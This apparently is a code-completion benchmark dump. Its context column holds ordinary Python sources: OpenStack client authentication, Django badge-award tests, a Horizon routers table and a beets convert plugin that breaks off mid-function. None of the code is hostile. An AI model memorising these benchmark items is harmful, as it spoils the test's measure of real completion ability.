gt
stringclasses 1
value | context
stringlengths 2.49k
119k
|
|---|---|
# Copyright 2012-2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Manage access to the clients, including authenticating when needed."""
import copy
import logging
import pkg_resources
import sys
from oslo_utils import strutils
import requests
from openstackclient.api import auth
from openstackclient.common import session as osc_session
from openstackclient.identity import client as identity_client
LOG = logging.getLogger(__name__)
PLUGIN_MODULES = []
USER_AGENT = 'python-openstackclient'
class ClientCache(object):
"""Descriptor class for caching created client handles."""
def __init__(self, factory):
self.factory = factory
self._handle = None
def __get__(self, instance, owner):
# Tell the ClientManager to login to keystone
if self._handle is None:
self._handle = self.factory(instance)
return self._handle
class ClientManager(object):
"""Manages access to API clients, including authentication."""
# A simple incrementing version for the plugin to know what is available
PLUGIN_INTERFACE_VERSION = "2"
identity = ClientCache(identity_client.make_client)
def __getattr__(self, name):
# this is for the auth-related parameters.
if name in ['_' + o.replace('-', '_')
for o in auth.OPTIONS_LIST]:
return self._auth_params[name[1:]]
raise AttributeError(name)
def __init__(
self,
cli_options=None,
api_version=None,
verify=True,
pw_func=None,
):
"""Set up a ClientManager
:param cli_options:
Options collected from the command-line, environment, or wherever
:param api_version:
Dict of API versions: key is API name, value is the version
:param verify:
TLS certificate verification; may be a boolean to enable or disable
server certificate verification, or a filename of a CA certificate
bundle to be used in verification (implies True)
:param pw_func:
Callback function for asking the user for a password. The function
takes an optional string for the prompt ('Password: ' on None) and
returns a string containing the password
"""
self._cli_options = cli_options
self._api_version = api_version
self._pw_callback = pw_func
self._url = self._cli_options.auth.get('url', None)
self._region_name = self._cli_options.region_name
self._interface = self._cli_options.interface
self.timing = self._cli_options.timing
self._auth_ref = None
self.session = None
# verify is the Requests-compatible form
self._verify = verify
# also store in the form used by the legacy client libs
self._cacert = None
if isinstance(verify, bool):
self._insecure = not verify
else:
self._cacert = verify
self._insecure = False
# Get logging from root logger
root_logger = logging.getLogger('')
LOG.setLevel(root_logger.getEffectiveLevel())
def setup_auth(self):
"""Set up authentication
This is deferred until authentication is actually attempted because
it gets in the way of things that do not require auth.
"""
# If no auth type is named by the user, select one based on
# the supplied options
self.auth_plugin_name = auth.select_auth_plugin(self._cli_options)
# Basic option checking to avoid unhelpful error messages
auth.check_valid_auth_options(self._cli_options, self.auth_plugin_name)
# Horrible hack alert...must handle prompt for null password if
# password auth is requested.
if (self.auth_plugin_name.endswith('password') and
not self._cli_options.auth.get('password', None)):
self._cli_options.auth['password'] = self._pw_callback()
(auth_plugin, self._auth_params) = auth.build_auth_params(
self.auth_plugin_name,
self._cli_options,
)
# TODO(mordred): This is a usability improvement that's broadly useful
# We should port it back up into os-client-config.
default_domain = self._cli_options.default_domain
# NOTE(stevemar): If PROJECT_DOMAIN_ID or PROJECT_DOMAIN_NAME is
# present, then do not change the behaviour. Otherwise, set the
# PROJECT_DOMAIN_ID to 'OS_DEFAULT_DOMAIN' for better usability.
if (self._api_version.get('identity') == '3' and
self.auth_plugin_name.endswith('password') and
not self._auth_params.get('project_domain_id', None) and
not self.auth_plugin_name.startswith('v2') and
not self._auth_params.get('project_domain_name', None)):
self._auth_params['project_domain_id'] = default_domain
# NOTE(stevemar): If USER_DOMAIN_ID or USER_DOMAIN_NAME is present,
# then do not change the behaviour. Otherwise, set the USER_DOMAIN_ID
# to 'OS_DEFAULT_DOMAIN' for better usability.
if (self._api_version.get('identity') == '3' and
self.auth_plugin_name.endswith('password') and
not self.auth_plugin_name.startswith('v2') and
not self._auth_params.get('user_domain_id', None) and
not self._auth_params.get('user_domain_name', None)):
self._auth_params['user_domain_id'] = default_domain
# For compatibility until all clients can be updated
if 'project_name' in self._auth_params:
self._project_name = self._auth_params['project_name']
elif 'tenant_name' in self._auth_params:
self._project_name = self._auth_params['tenant_name']
LOG.info('Using auth plugin: %s' % self.auth_plugin_name)
LOG.debug('Using parameters %s' %
strutils.mask_password(self._auth_params))
self.auth = auth_plugin.load_from_options(**self._auth_params)
# needed by SAML authentication
request_session = requests.session()
self.session = osc_session.TimingSession(
auth=self.auth,
session=request_session,
verify=self._verify,
user_agent=USER_AGENT,
)
return
@property
def auth_ref(self):
"""Dereference will trigger an auth if it hasn't already"""
if not self._auth_ref:
self.setup_auth()
LOG.debug("Get auth_ref")
self._auth_ref = self.auth.get_auth_ref(self.session)
return self._auth_ref
def get_endpoint_for_service_type(self, service_type, region_name=None,
interface='public'):
"""Return the endpoint URL for the service type."""
if not interface:
interface = 'public'
# See if we are using password flow auth, i.e. we have a
# service catalog to select endpoints from
if self.auth_ref:
endpoint = self.auth_ref.service_catalog.url_for(
service_type=service_type,
region_name=region_name,
endpoint_type=interface,
)
else:
# Get the passed endpoint directly from the auth plugin
endpoint = self.auth.get_endpoint(self.session,
interface=interface)
return endpoint
def get_configuration(self):
return copy.deepcopy(self._cli_options.config)
# Plugin Support
def get_plugin_modules(group):
"""Find plugin entry points"""
mod_list = []
for ep in pkg_resources.iter_entry_points(group):
LOG.debug('Found plugin %r', ep.name)
__import__(ep.module_name)
module = sys.modules[ep.module_name]
mod_list.append(module)
init_func = getattr(module, 'Initialize', None)
if init_func:
init_func('x')
# Add the plugin to the ClientManager
setattr(
ClientManager,
module.API_NAME,
ClientCache(
getattr(sys.modules[ep.module_name], 'make_client', None)
),
)
return mod_list
def build_plugin_option_parser(parser):
"""Add plugin options to the parser"""
# Loop through extensions to get parser additions
for mod in PLUGIN_MODULES:
parser = mod.build_option_parser(parser)
return parser
# Get list of base plugin modules
PLUGIN_MODULES = get_plugin_modules(
'openstack.cli.base',
)
# Append list of external plugin modules
PLUGIN_MODULES.extend(get_plugin_modules(
'openstack.cli.extension',
))
|
|
from os.path import dirname
import logging
import time
try:
from PIL import Image
except ImportError:
import Image
from django.conf import settings
from django.core.management import call_command
from django.db.models import loading
from django.core.files.base import ContentFile
from django.http import HttpRequest
from django.utils import simplejson as json
from django.test.client import Client
from django.core import mail
from nose.tools import assert_equal, with_setup, assert_false, eq_, ok_
from nose.plugins.attrib import attr
from django.template.defaultfilters import slugify
try:
from funfactory.urlresolvers import reverse
except ImportError, e:
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from . import BadgerTestCase
import badger
from badger.models import (Badge, Award, Progress, DeferredAward,
BadgeAwardNotAllowedException,
BadgeAlreadyAwardedException,
DeferredAwardGrantNotAllowedException,
SITE_ISSUER)
from badger.tests.badger_example.models import GuestbookEntry
BASE_URL = 'http://example.com'
BADGE_IMG_FN = "%s/fixtures/default-badge.png" % dirname(dirname(__file__))
class BadgerBadgeTest(BadgerTestCase):
def test_get_badge(self):
"""Can create a badge"""
badge = self._get_badge()
eq_(slugify(badge.title), badge.slug)
ok_(badge.created is not None)
ok_(badge.modified is not None)
eq_(badge.created.year, badge.modified.year)
eq_(badge.created.month, badge.modified.month)
eq_(badge.created.day, badge.modified.day)
def test_award_badge(self):
"""Can award a badge to a user"""
badge = self._get_badge()
user = self._get_user()
ok_(not badge.is_awarded_to(user))
badge.award_to(awardee=user, awarder=badge.creator)
ok_(badge.is_awarded_to(user))
def test_award_unique_duplication(self):
"""Only one award for a unique badge can be created"""
user = self._get_user()
b = Badge.objects.create(slug='one-and-only', title='One and Only',
unique=True, creator=user)
a = Award.objects.create(badge=b, user=user)
# award_to should not trigger the exception
b.award_to(awardee=user)
try:
a = Award.objects.create(badge=b, user=user)
ok_(False, 'BadgeAlreadyAwardedException should have been raised')
except BadgeAlreadyAwardedException, e:
# But, directly creating another award should trigger the exception
pass
eq_(1, Award.objects.filter(badge=b, user=user).count())
class BadgerOBITest(BadgerTestCase):
def test_baked_award_image(self):
"""Award gets image baked with OBI assertion"""
# Get the source for a sample badge image
img_data = open(BADGE_IMG_FN, 'r').read()
# Make a badge with a creator
user_creator = self._get_user(username="creator")
badge = self._get_badge(title="Badge with Creator",
creator=user_creator)
badge.image.save('', ContentFile(img_data), True)
# Get some users who can award any badge
user_1 = self._get_user(username="superuser_1", is_superuser=True)
user_2 = self._get_user(username="superuser_2", is_superuser=True)
# Get some users who can receive badges
user_awardee_1 = self._get_user(username="awardee_1")
user_awardee_2 = self._get_user(username="awardee_1")
# Award a badge, and try to extract the badge assertion baked in
award_1 = badge.award_to(awardee=user_awardee_1)
ok_(award_1.image)
img = Image.open(award_1.image.file)
hosted_assertion_url = img.info['openbadges']
expected_url = '%s%s' % (
BASE_URL, reverse('badger.award_detail_json',
args=(award_1.badge.slug, award_1.id)))
eq_(expected_url, hosted_assertion_url)
return True
# TODO: Re-enable the testing below, if/when we go back to baking JSON
# rather than hosted assertion URLs.
assertion = json.loads(img.info['openbadges'])
# Check the top-level award assertion data
eq_(award_1.user.email, assertion['recipient'])
eq_('%s%s' % (BASE_URL, award_1.get_absolute_url()),
assertion['evidence'])
# Check some of the badge details in the assertion
a_badge = assertion['badge']
eq_('0.5.0', a_badge['version'])
eq_(badge.title, a_badge['name'])
eq_(badge.description, a_badge['description'])
eq_('%s%s' % (BASE_URL, badge.get_absolute_url()),
a_badge['criteria'])
# Check the badge issuer details
b_issuer = a_badge['issuer']
eq_(badge.creator.username, b_issuer['name'])
eq_(badge.creator.email, b_issuer['contact'])
eq_('%s%s' % (BASE_URL, badge.creator.get_absolute_url()),
b_issuer['origin'])
# Award a badge, and check that the awarder appears as issuer
award_2 = badge.award_to(awardee=user_awardee_2, awarder=user_1)
ok_(award_2.image)
img = Image.open(award_2.image.file)
assertion = json.loads(img.info['openbadges'])
b_issuer = assertion['badge']['issuer']
eq_(user_1.username, b_issuer['name'])
eq_(user_1.email, b_issuer['contact'])
eq_(BASE_URL, b_issuer['origin'])
# Make a badge with no creator
badge_no_creator = self._get_badge(title="Badge no Creator",
creator=False)
badge_no_creator.image.save('', ContentFile(img_data), True)
# Award a badge, and check that the site issuer is used
award_3 = badge_no_creator.award_to(awardee=user_awardee_1)
ok_(award_3.image)
img = Image.open(award_3.image.file)
assertion = json.loads(img.info['openbadges'])
b_issuer = assertion['badge']['issuer']
eq_(SITE_ISSUER['name'], b_issuer['name'])
eq_(SITE_ISSUER['contact'], b_issuer['contact'])
eq_(SITE_ISSUER['origin'], b_issuer['origin'])
class BadgerProgressTest(BadgerTestCase):
def test_progress_badge_already_awarded(self):
"""New progress toward an awarded unique badge cannot be recorded"""
user = self._get_user()
b = Badge.objects.create(slug='one-and-only', title='One and Only',
unique=True, creator=user)
p = b.progress_for(user)
p.update_percent(100)
try:
p = Progress.objects.create(badge=b, user=user)
ok_(False, 'BadgeAlreadyAwardedException should have been raised')
except BadgeAlreadyAwardedException, e:
pass
# None, because award deletes progress.
eq_(0, Progress.objects.filter(badge=b, user=user).count())
class BadgerDeferredAwardTest(BadgerTestCase):
def test_claim_by_code(self):
"""Can claim a deferred award by claim code"""
user = self._get_user()
awardee = self._get_user(username='winner1',
email='winner@example.com')
badge1 = self._get_badge(title="Test A", creator=user)
ok_(not badge1.is_awarded_to(awardee))
da = DeferredAward(badge=badge1)
da.save()
code = da.claim_code
eq_(1, DeferredAward.objects.filter(claim_code=code).count())
DeferredAward.objects.claim_by_code(awardee, code)
eq_(0, DeferredAward.objects.filter(claim_code=code).count())
ok_(badge1.is_awarded_to(awardee))
# Ensure the award was marked with the claim code.
award = Award.objects.get(claim_code=code)
eq_(award.badge.pk, badge1.pk)
def test_claim_by_email(self):
"""Can claim all deferred awards by email address"""
deferred_email = 'winner@example.com'
user = self._get_user()
titles = ("Test A", "Test B", "Test C")
badges = (self._get_badge(title=title, creator=user)
for title in titles)
deferreds = []
# Issue deferred awards for each of the badges.
for badge in badges:
result = badge.award_to(email=deferred_email, awarder=user)
deferreds.append(result)
ok_(hasattr(result, 'claim_code'))
# Scour the mail outbox for claim messages.
for deferred in deferreds:
found = False
for msg in mail.outbox:
if (deferred.badge.title in msg.subject and
deferred.get_claim_url() in msg.body):
found = True
ok_(found, '%s should have been found in subject' %
deferred.badge.title)
# Register an awardee user with the email address, but the badge should
# not have been awarded yet.
awardee = self._get_user(username='winner2', email=deferred_email)
for badge in badges:
ok_(not badge.is_awarded_to(awardee))
# Now, claim the deferred awards, and they should all self-destruct
eq_(3, DeferredAward.objects.filter(email=awardee.email).count())
DeferredAward.objects.claim_by_email(awardee)
eq_(0, DeferredAward.objects.filter(email=awardee.email).count())
# After claiming, the awards should exist.
for badge in badges:
ok_(badge.is_awarded_to(awardee))
def test_reusable_claim(self):
"""Can repeatedly claim a reusable deferred award"""
user = self._get_user()
awardee = self._get_user(username='winner1',
email='winner@example.com')
badge1 = self._get_badge(title="Test A", creator=user, unique=False)
ok_(not badge1.is_awarded_to(awardee))
da = DeferredAward(badge=badge1, reusable=True)
da.save()
code = da.claim_code
for i in range(0, 5):
eq_(1, DeferredAward.objects.filter(claim_code=code).count())
DeferredAward.objects.claim_by_code(awardee, code)
ok_(badge1.is_awarded_to(awardee))
eq_(5, Award.objects.filter(badge=badge1, user=awardee).count())
def test_disallowed_claim(self):
"""Deferred award created by someone not allowed to award a badge
cannot be claimed"""
user = self._get_user()
random_guy = self._get_user(username='random_guy',
is_superuser=False)
awardee = self._get_user(username='winner1',
email='winner@example.com')
badge1 = self._get_badge(title="Test A", creator=user)
ok_(not badge1.is_awarded_to(awardee))
da = DeferredAward(badge=badge1, creator=random_guy)
da.save()
code = da.claim_code
eq_(1, DeferredAward.objects.filter(claim_code=code).count())
result = DeferredAward.objects.claim_by_code(awardee, code)
eq_(0, DeferredAward.objects.filter(claim_code=code).count())
ok_(not badge1.is_awarded_to(awardee))
def test_granted_claim(self):
"""Reusable deferred award can be granted to someone by email"""
# Assemble the characters involved...
creator = self._get_user()
random_guy = self._get_user(username='random_guy',
email='random_guy@example.com',
is_superuser=False)
staff_person = self._get_user(username='staff_person',
email='staff@example.com',
is_staff=True)
grantee_email = 'winner@example.com'
grantee = self._get_user(username='winner1',
email=grantee_email)
# Create a consumable award claim
badge1 = self._get_badge(title="Test A", creator=creator)
original_email = 'original@example.com'
da = DeferredAward(badge=badge1, creator=creator, email=original_email)
claim_code = da.claim_code
da.save()
# Grant the deferred award, ensure the existing one is modified.
new_da = da.grant_to(email=grantee_email, granter=staff_person)
ok_(claim_code != new_da.claim_code)
ok_(da.email != original_email)
eq_(da.pk, new_da.pk)
eq_(new_da.email, grantee_email)
# Claim the deferred award, assert that the appropriate deferred award
# was destroyed
eq_(1, DeferredAward.objects.filter(pk=da.pk).count())
eq_(1, DeferredAward.objects.filter(pk=new_da.pk).count())
DeferredAward.objects.claim_by_email(grantee)
eq_(0, DeferredAward.objects.filter(pk=da.pk).count())
eq_(0, DeferredAward.objects.filter(pk=new_da.pk).count())
# Finally, assert the award condition
ok_(badge1.is_awarded_to(grantee))
# Create a reusable award claim
badge2 = self._get_badge(title="Test B", creator=creator)
da = DeferredAward(badge=badge2, creator=creator, reusable=True)
claim_code = da.claim_code
da.save()
# Grant the deferred award, ensure a new deferred award is generated.
new_da = da.grant_to(email=grantee_email, granter=staff_person)
ok_(claim_code != new_da.claim_code)
ok_(da.pk != new_da.pk)
eq_(new_da.email, grantee_email)
# Claim the deferred award, assert that the appropriate deferred award
# was destroyed
eq_(1, DeferredAward.objects.filter(pk=da.pk).count())
eq_(1, DeferredAward.objects.filter(pk=new_da.pk).count())
DeferredAward.objects.claim_by_email(grantee)
eq_(1, DeferredAward.objects.filter(pk=da.pk).count())
eq_(0, DeferredAward.objects.filter(pk=new_da.pk).count())
# Finally, assert the award condition
ok_(badge2.is_awarded_to(grantee))
# Create one more award claim
badge3 = self._get_badge(title="Test C", creator=creator)
da = DeferredAward(badge=badge3, creator=creator)
claim_code = da.claim_code
da.save()
# Grant the deferred award, ensure a new deferred award is generated.
try:
new_da = da.grant_to(email=grantee_email, granter=random_guy)
is_ok = False
except Exception, e:
ok_(type(e) is DeferredAwardGrantNotAllowedException)
is_ok = True
ok_(is_ok, "Permission should be required for granting")
def test_mass_generate_claim_codes(self):
"""Claim codes can be generated in mass for a badge"""
# Assemble the characters involved...
creator = self._get_user()
random_guy = self._get_user(username='random_guy',
email='random_guy@example.com',
is_superuser=False)
staff_person = self._get_user(username='staff_person',
email='staff@example.com',
is_staff=True)
# Create a consumable award claim
badge1 = self._get_badge(title="Test A", creator=creator)
eq_(0, len(badge1.claim_groups))
# Generate a number of groups of varying size
num_awards = (10, 20, 40, 80, 100)
num_groups = len(num_awards)
groups_generated = dict()
for x in range(0, num_groups):
num = num_awards[x]
cg = badge1.generate_deferred_awards(user=creator, amount=num)
time.sleep(1.0)
groups_generated[cg] = num
eq_(num, DeferredAward.objects.filter(claim_group=cg).count())
# Ensure the expected claim groups are available
eq_(num_groups, len(badge1.claim_groups))
for item in badge1.claim_groups:
cg = item['claim_group']
eq_(groups_generated[cg], item['count'])
# Delete deferred awards found in the first claim group
cg_1 = badge1.claim_groups[0]['claim_group']
badge1.delete_claim_group(user=creator, claim_group=cg_1)
# Assert that the claim group is gone, and now there's one less.
eq_(num_groups - 1, len(badge1.claim_groups))
|
|
# Copyright 2012, Nachi Ueno, NTT MCL, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.template import defaultfilters as filters
from django.urls import reverse
from django.utils.translation import pgettext_lazy
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import ungettext_lazy
from neutronclient.common import exceptions as neutron_exceptions
from horizon import exceptions
from horizon import tables
from horizon.tables import actions
from openstack_dashboard import api
from openstack_dashboard import policy
from openstack_dashboard.usage import quotas
LOG = logging.getLogger(__name__)
class DeleteRouter(policy.PolicyTargetMixin, tables.DeleteAction):
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Delete Router",
u"Delete Routers",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Deleted Router",
u"Deleted Routers",
count
)
redirect_url = "horizon:project:routers:index"
policy_rules = (("network", "delete_router"),)
@actions.handle_exception_with_detail_message(
# normal_log_message
'Failed to delete router %(id)s: %(exc)s',
# target_exception
neutron_exceptions.NeutronClientException,
# target_log_message
'Unable to delete router %(id)s: %(exc)s',
# target_user_message
_('Unable to delete router %(name)s: %(exc)s'),
# logger_name
__name__)
def delete(self, request, obj_id):
# detach all interfaces before attempting to delete the router
search_opts = {'device_owner': 'network:router_interface',
'device_id': obj_id}
ports = api.neutron.port_list(request, **search_opts)
for port in ports:
api.neutron.router_remove_interface(request, obj_id,
port_id=port.id)
api.neutron.router_delete(request, obj_id)
class CreateRouter(tables.LinkAction):
name = "create"
verbose_name = _("Create Router")
url = "horizon:project:routers:create"
classes = ("ajax-modal",)
icon = "plus"
policy_rules = (("network", "create_router"),)
def allowed(self, request, datum=None):
usages = quotas.tenant_quota_usages(request, targets=('router', ))
# when Settings.OPENSTACK_NEUTRON_NETWORK['enable_quotas'] = False
# usages['router'] is empty
if usages.get('router', {}).get('available', 1) <= 0:
if "disabled" not in self.classes:
self.classes = [c for c in self.classes] + ["disabled"]
self.verbose_name = _("Create Router (Quota exceeded)")
else:
self.verbose_name = _("Create Router")
self.classes = [c for c in self.classes if c != "disabled"]
return True
class EditRouter(policy.PolicyTargetMixin, tables.LinkAction):
name = "update"
verbose_name = _("Edit Router")
url = "horizon:project:routers:update"
classes = ("ajax-modal",)
icon = "pencil"
policy_rules = (("network", "update_router"),)
class SetGateway(policy.PolicyTargetMixin, tables.LinkAction):
name = "setgateway"
verbose_name = _("Set Gateway")
url = "horizon:project:routers:setgateway"
classes = ("ajax-modal",)
icon = "camera"
policy_rules = (("network", "update_router"),)
def allowed(self, request, datum=None):
if datum.external_gateway_info:
return False
return True
class ClearGateway(policy.PolicyTargetMixin, tables.BatchAction):
help_text = _("You may reset the gateway later by using the"
" set gateway action, but the gateway IP may change.")
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Clear Gateway",
u"Clear Gateways",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Cleared Gateway",
u"Cleared Gateways",
count
)
name = "clear"
classes = ('btn-cleargateway',)
redirect_url = "horizon:project:routers:index"
policy_rules = (("network", "update_router"),)
action_type = "danger"
@actions.handle_exception_with_detail_message(
# normal_log_message
'Unable to clear gateway for router %(id)s: %(exc)s',
# target_exception
neutron_exceptions.Conflict,
# target_log_message
'Unable to clear gateway for router %(id)s: %(exc)s',
# target_user_message
_('Unable to clear gateway for router %(name)s. '
'Most possible reason is because the gateway is required '
'by one or more floating IPs'),
# logger_name
__name__)
def action(self, request, obj_id):
api.neutron.router_remove_gateway(request, obj_id)
def get_success_url(self, request):
return reverse(self.redirect_url)
def allowed(self, request, datum=None):
if datum.external_gateway_info:
return True
return False
class UpdateRow(tables.Row):
ajax = True
def get_data(self, request, router_id):
router = api.neutron.router_get(request, router_id)
return router
def get_external_network(router):
if router.external_gateway_info:
return router.external_gateway_info['network']
else:
return _("-")
def get_availability_zones(router):
if 'availability_zones' in router and router.availability_zones:
return ', '.join(router.availability_zones)
else:
return _("-")
class RoutersFilterAction(tables.FilterAction):
name = 'filter_project_routers'
filter_type = 'server'
filter_choices = (('name', _("Router Name ="), True),
('status', _("Status ="), True),
('admin_state_up', _("Admin State ="), True,
_("e.g. UP / DOWN")))
STATUS_DISPLAY_CHOICES = (
("active", pgettext_lazy("current status of router", u"Active")),
("error", pgettext_lazy("current status of router", u"Error")),
)
ADMIN_STATE_DISPLAY_CHOICES = (
("up", pgettext_lazy("Admin state of a Router", u"UP")),
("down", pgettext_lazy("Admin state of a Router", u"DOWN")),
)
class RoutersTable(tables.DataTable):
name = tables.WrappingColumn("name",
verbose_name=_("Name"),
link="horizon:project:routers:detail")
status = tables.Column("status",
verbose_name=_("Status"),
status=True,
display_choices=STATUS_DISPLAY_CHOICES)
distributed = tables.Column("distributed",
filters=(filters.yesno, filters.capfirst),
verbose_name=_("Distributed"))
ha = tables.Column("ha",
filters=(filters.yesno, filters.capfirst),
# Translators: High Availability mode of Neutron router
verbose_name=_("HA mode"))
ext_net = tables.Column(get_external_network,
verbose_name=_("External Network"))
admin_state = tables.Column("admin_state",
verbose_name=_("Admin State"),
display_choices=ADMIN_STATE_DISPLAY_CHOICES)
availability_zones = tables.Column(get_availability_zones,
verbose_name=_("Availability Zones"))
def __init__(self, request, data=None, needs_form_wrapper=None, **kwargs):
super(RoutersTable, self).__init__(
request,
data=data,
needs_form_wrapper=needs_form_wrapper,
**kwargs)
if not api.neutron.get_feature_permission(request, "dvr", "get"):
del self.columns["distributed"]
if not api.neutron.get_feature_permission(request, "l3-ha", "get"):
del self.columns["ha"]
try:
if not api.neutron.is_extension_supported(
request, "router_availability_zone"):
del self.columns["availability_zones"]
except Exception:
msg = _("Unable to check if router availability zone extension "
"is supported")
exceptions.handle(self.request, msg)
del self.columns['availability_zones']
def get_object_display(self, obj):
return obj.name
class Meta(object):
name = "routers"
verbose_name = _("Routers")
status_columns = ["status"]
row_class = UpdateRow
table_actions = (CreateRouter, DeleteRouter,
RoutersFilterAction)
row_actions = (SetGateway, ClearGateway, EditRouter, DeleteRouter)
|
|
# -*- coding: utf-8 -*-
# This file is part of beets.
# Copyright 2016, Jakob Schnitzer.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Converts tracks or albums to external directory
"""
from __future__ import division, absolute_import, print_function
import os
import threading
import subprocess
import tempfile
import shlex
from string import Template
from beets import ui, util, plugins, config
from beets.plugins import BeetsPlugin
from beets.util.confit import ConfigTypeError
from beets import art
from beets.util.artresizer import ArtResizer
_fs_lock = threading.Lock()
_temp_files = [] # Keep track of temporary transcoded files for deletion.
# Some convenient alternate names for formats.
ALIASES = {
u'wma': u'windows media',
u'vorbis': u'ogg',
}
LOSSLESS_FORMATS = ['ape', 'flac', 'alac', 'wav']
def replace_ext(path, ext):
"""Return the path with its extension replaced by `ext`.
The new extension must not contain a leading dot.
"""
return os.path.splitext(path)[0] + b'.' + ext
def get_format(fmt=None):
"""Return the command tempate and the extension from the config.
"""
if not fmt:
fmt = config['convert']['format'].get(unicode).lower()
fmt = ALIASES.get(fmt, fmt)
try:
format_info = config['convert']['formats'][fmt].get(dict)
command = format_info['command']
extension = format_info['extension']
except KeyError:
raise ui.UserError(
u'convert: format {0} needs "command" and "extension" fields'
.format(fmt)
)
except ConfigTypeError:
command = config['convert']['formats'][fmt].get(bytes)
extension = fmt
# Convenience and backwards-compatibility shortcuts.
keys = config['convert'].keys()
if 'command' in keys:
command = config['convert']['command'].get(unicode)
elif 'opts' in keys:
# Undocumented option for backwards compatibility with < 1.3.1.
command = u'ffmpeg -i $source -y {0} $dest'.format(
config['convert']['opts'].get(unicode)
)
if 'extension' in keys:
extension = config['convert']['extension'].get(unicode)
return (command.encode('utf8'), extension.encode('utf8'))
def should_transcode(item, fmt):
"""Determine whether the item should be transcoded as part of
conversion (i.e., its bitrate is high or it has the wrong format).
"""
if config['convert']['never_convert_lossy_files'] and \
not (item.format.lower() in LOSSLESS_FORMATS):
return False
maxbr = config['convert']['max_bitrate'].get(int)
return fmt.lower() != item.format.lower() or \
item.bitrate >= 1000 * maxbr
class ConvertPlugin(BeetsPlugin):
def __init__(self):
super(ConvertPlugin, self).__init__()
self.config.add({
u'dest': None,
u'pretend': False,
u'threads': util.cpu_count(),
u'format': u'mp3',
u'formats': {
u'aac': {
u'command': u'ffmpeg -i $source -y -vn -acodec libfaac '
u'-aq 100 $dest',
u'extension': u'm4a',
},
u'alac': {
u'command': u'ffmpeg -i $source -y -vn -acodec alac $dest',
u'extension': u'm4a',
},
u'flac': u'ffmpeg -i $source -y -vn -acodec flac $dest',
u'mp3': u'ffmpeg -i $source -y -vn -aq 2 $dest',
u'opus':
u'ffmpeg -i $source -y -vn -acodec libopus -ab 96k $dest',
u'ogg':
u'ffmpeg -i $source -y -vn -acodec libvorbis -aq 2 $dest',
u'wma':
u'ffmpeg -i $source -y -vn -acodec wmav2 -vn $dest',
},
u'max_bitrate': 500,
u'auto': False,
u'tmpdir': None,
u'quiet': False,
u'embed': True,
u'paths': {},
u'never_convert_lossy_files': False,
u'copy_album_art': False,
u'album_art_maxwidth': 0,
})
self.import_stages = [self.auto_convert]
self.register_listener('import_task_files', self._cleanup)
def commands(self):
cmd = ui.Subcommand('convert', help=u'convert to external location')
cmd.parser.add_option('-p', '--pretend', action='store_true',
help=u'show actions but do nothing')
cmd.parser.add_option('-t', '--threads', action='store', type='int',
help=u'change the number of threads, \
defaults to maximum available processors')
cmd.parser.add_option('-k', '--keep-new', action='store_true',
dest='keep_new', help=u'keep only the converted \
and move the old files')
cmd.parser.add_option('-d', '--dest', action='store',
help=u'set the destination directory')
cmd.parser.add_option('-f', '--format', action='store', dest='format',
help=u'set the target format of the tracks')
cmd.parser.add_option('-y', '--yes', action='store_true', dest='yes',
help=u'do not ask for confirmation')
cmd.parser.add_album_option()
cmd.func = self.convert_func
return [cmd]
def auto_convert(self, config, task):
if self.config['auto']:
for item in task.imported_items():
self.convert_on_import(config.lib, item)
# Utilities converted from functions to methods on logging overhaul
def encode(self, command, source, dest, pretend=False):
"""Encode `source` to `dest` using command template `command`.
Raises `subprocess.CalledProcessError` if the command exited with a
non-zero status code.
"""
# The paths and arguments must be bytes.
assert isinstance(command, bytes)
assert isinstance(source, bytes)
assert isinstance(dest, bytes)
quiet = self.config['quiet'].get(bool)
if not quiet and not pretend:
self._log.info(u'Encoding {0}', util.displayable_path(source))
# Substitute $source and $dest in the argument list.
args = shlex.split(command)
for i, arg in enumerate(args):
args[i] = Template(arg).safe_substitute({
b'source': source,
b'dest': dest,
})
if pretend:
self._log.info(' '.join(ui.decargs(args)))
return
try:
util.command_output(args)
except subprocess.CalledProcessError as exc:
# Something went wrong (probably Ctrl+C), remove temporary files
self._log.info(u'Encoding {0} failed. Cleaning up...',
util.displayable_path(source))
self._log.debug(u'Command {0} exited with status {1}',
exc.cmd.decode('utf8', 'ignore'),
exc.returncode)
util.remove(dest)
util.prune_dirs(os.path.dirname(dest))
raise
except OSError as exc:
raise ui.UserError(
u"convert: could invoke '{0}': {1}".format(
' '.join(args), exc
)
)
if not quiet and not pretend:
self._log.info(u'Finished encoding {0}',
util.displayable_path(source))
def convert_item(self, dest_dir, keep_new, path_formats, fmt,
pretend=False):
command, ext = get_format(fmt)
item, original, converted = None, None, None
while True:
item = yield (item, original, converted)
dest = item.destination(basedir=dest_dir,
path_formats=path_formats)
# When keeping the new file in the library, we first move the
# current (pristine) file to the destination. We'll then copy it
# back to its old path or transcode it to a new path.
if keep_new:
original = dest
converted = item.path
if should_transcode(item, fmt):
converted = replace_ext(converted, ext)
else:
original = item.path
if should_transcode(item, fmt):
dest = replace_ext(dest, ext)
converted = dest
# Ensure that only one thread tries to create directories at a
# time. (The existence check is not atomic with the directory
# creation inside this function.)
if not pretend:
with _fs_lock:
util.mkdirall(dest)
if os.path.exists(util.syspath(dest)):
self._log.info(u'Skipping {0} (target file exists)',
